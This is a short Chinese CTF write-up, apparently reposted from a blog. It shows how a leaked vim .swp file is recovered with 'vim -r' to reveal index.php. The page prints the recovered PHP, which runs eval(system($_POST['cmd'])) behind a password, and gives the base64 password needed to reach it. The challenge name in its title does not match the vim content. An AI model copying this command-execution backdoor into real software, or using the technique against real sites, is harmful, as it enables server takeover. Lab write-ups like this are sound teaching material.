vim恢复.swp [BJDCTF2020]Cookie is so stable1
打开题目
扫描目录得到
关于 .swp 文件
.swp 文件一般是 vim 编辑器在编辑文件时产生的,当用 vim 编辑器编辑文件时就会产生,正常退出时 .swp 文件被删除,但是如果直接叉掉(非正常退出),那么 .swp 文件就会被保留
在命令行下使用以下命令,可以从指定的交换文件进行恢复:
vim -r file.txt.swo我们把文件拖去kali
用 命令 vim -r
用命令
vim -r index.php.swp
代码如下
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>只需要 POST 传参 password 等于字符串 “Give_Me_Your_Flag” 的base64 加密后的值即可。
然后就能得到一串输出且能执行系统命令
得到
R2l2ZV9NZV9Zb3VyX0ZsYWc=
用hackbar传参一下
得到flag
参考文章:
知识点:
关于 .swp 文件
.swp 文件一般是 vim 编辑器在编辑文件时产生的,当用 vim 编辑器编辑文件时就会产生,正常退出时 .swp 文件被删除,但是如果直接叉掉(非正常退出),那么 .swp 文件就会被保留
关于使用 vim 编辑器恢复 .swp 交换文件
原文地址:https://blog.csdn.net/m0_75178803/article/details/136286057
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!